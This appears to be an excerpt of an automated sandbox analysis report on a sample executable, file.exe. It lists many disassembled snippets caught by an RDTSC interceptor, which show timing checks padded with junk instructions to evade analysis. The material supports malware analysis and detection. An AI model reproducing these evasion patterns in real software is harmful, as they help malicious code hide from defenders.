                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FDFE second address: 87FE0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F037 second address: 87F060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F57D451A1BCh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F57D451A1BDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F57D451A1B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880045 second address: 88004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880F42 second address: 880F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880F46 second address: 880F4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881F99 second address: 881FBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F57D451A1BCh 0x00000008 jo 00007F57D451A1B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F57D451A1C0h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EBB second address: 883EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EC1 second address: 883EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F24 second address: 882F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EC8 second address: 883ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F28 second address: 882F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883ED6 second address: 883EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F2E second address: 882F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F57D4F134DCh 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EDA second address: 883EE0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883031 second address: 883037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888082 second address: 888088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888088 second address: 88808C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88931C second address: 88933E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F57D451A1C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88933E second address: 889344 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA0D second address: 88DA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA13 second address: 88DA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F57D4F134E7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA2F second address: 88DA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA38 second address: 88DA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F57D4F134D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D16C second address: 88D18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C9h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D2DC second address: 88D2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D2E2 second address: 88D2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D2E6 second address: 88D30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134E9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jnc 00007F57D4F134D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D30E second address: 88D313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D313 second address: 88D31C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D31C second address: 88D322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891A7E second address: 891A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891C1A second address: 891C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A2D7 second address: 89A2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F57D4F134D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E32 second address: 898E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F57D451A1C2h 0x00000010 jmp 00007F57D451A1C9h 0x00000015 jnp 00007F57D451A1B6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E6F second address: 898E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E75 second address: 898E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E79 second address: 898E9C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F57D4F134D6h 0x00000008 jmp 00007F57D4F134E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E9C second address: 898EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899753 second address: 899759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899759 second address: 89976D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899BAA second address: 899BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a jns 00007F57D4F134D6h 0x00000010 jns 00007F57D4F134D6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F57D4F134DBh 0x00000020 jg 00007F57D4F134D8h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FFC second address: 89A00E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F57D451A1BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A00E second address: 89A012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A28BC second address: 8A28C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A28C8 second address: 8A28CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A28CC second address: 8A28E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F57D451A1C2h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1760 second address: 8A1777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1777 second address: 8A1781 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F57D451A1B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1925 second address: 8A1929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1929 second address: 8A192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BD5 second address: 8A1BF4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F57D4F134E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BF4 second address: 8A1BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A126D second address: 8A12A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F57D4F134E2h 0x00000008 jno 00007F57D4F134D6h 0x0000000e jns 00007F57D4F134D6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F57D4F134E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F57D4F134D6h 0x00000024 je 00007F57D4F134D6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A12A4 second address: 8A12E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C6h 0x00000007 jmp 00007F57D451A1C4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F57D451A1BCh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2277 second address: 8A227D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A227D second address: 8A2283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2283 second address: 8A228E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F57D4F134D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2554 second address: 8A2558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5BFB second address: 8A5BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5BFF second address: 8A5C2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F57D451A1BDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90BF second address: 8A90C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90C3 second address: 8A90F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F57D451A1D0h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F57D451A1C8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F57D451A1B6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90F7 second address: 8A910D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DCh 0x00000007 jbe 00007F57D4F134D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A910D second address: 8A9114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871E4B second address: 871E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871E4F second address: 871E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F57D451A1B8h 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jo 00007F57D451A1B6h 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871FB7 second address: 871FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87236D second address: 87237A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872A8E second address: 872A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B42 second address: 872BB4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F57D451A1C4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub edi, 595A8B00h 0x00000011 lea eax, dword ptr [ebp+1248364Ch] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F57D451A1B8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 clc 0x00000032 jng 00007F57D451A1BCh 0x00000038 mov edi, dword ptr [ebp+1245D66Fh] 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F57D451A1C7h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BB4 second address: 872BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BBA second address: 872BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F57D451A1B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BC5 second address: 872BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F57D4F134E8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BE8 second address: 872C28 instructions: 0x00000000 rdtsc 0x00000002 je 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dx, B75Fh 0x00000010 lea eax, dword ptr [ebp+12483608h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F57D451A1B8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr [ebp+1244C90Fh], ecx 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C28 second address: 872C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C2C second address: 852B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F57D451A1BFh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F57D451A1B8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edx, esi 0x0000002e call dword ptr [ebp+122D24CAh] 0x00000034 jnl 00007F57D451A1C6h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 852B52 second address: 852B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A966A second address: 8A9679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9679 second address: 8A967F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9804 second address: 8A980A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9C05 second address: 8A9C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F57D4F134D6h 0x0000000a jmp 00007F57D4F134DBh 0x0000000f popad 0x00000010 push edi 0x00000011 jmp 00007F57D4F134E5h 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9C32 second address: 8A9C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F57D451A1B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007F57D451A1B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9C47 second address: 8A9C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE8CC second address: 8AE8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEF38 second address: 8AEF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF1E7 second address: 8AF1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF397 second address: 8AF3AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3AE second address: 8AF3C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3C0 second address: 8AF3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF3C6 second address: 8AF3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF53C second address: 8AF559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE4CD second address: 8AE4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F57D451A1CCh 0x0000000a jmp 00007F57D451A1C4h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B16 second address: 8B4B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B1E second address: 8B4B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F57D451A1BDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B32 second address: 8B4B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F57D4F134E0h 0x00000011 jns 00007F57D4F134D6h 0x00000017 pop ebx 0x00000018 rdtsc
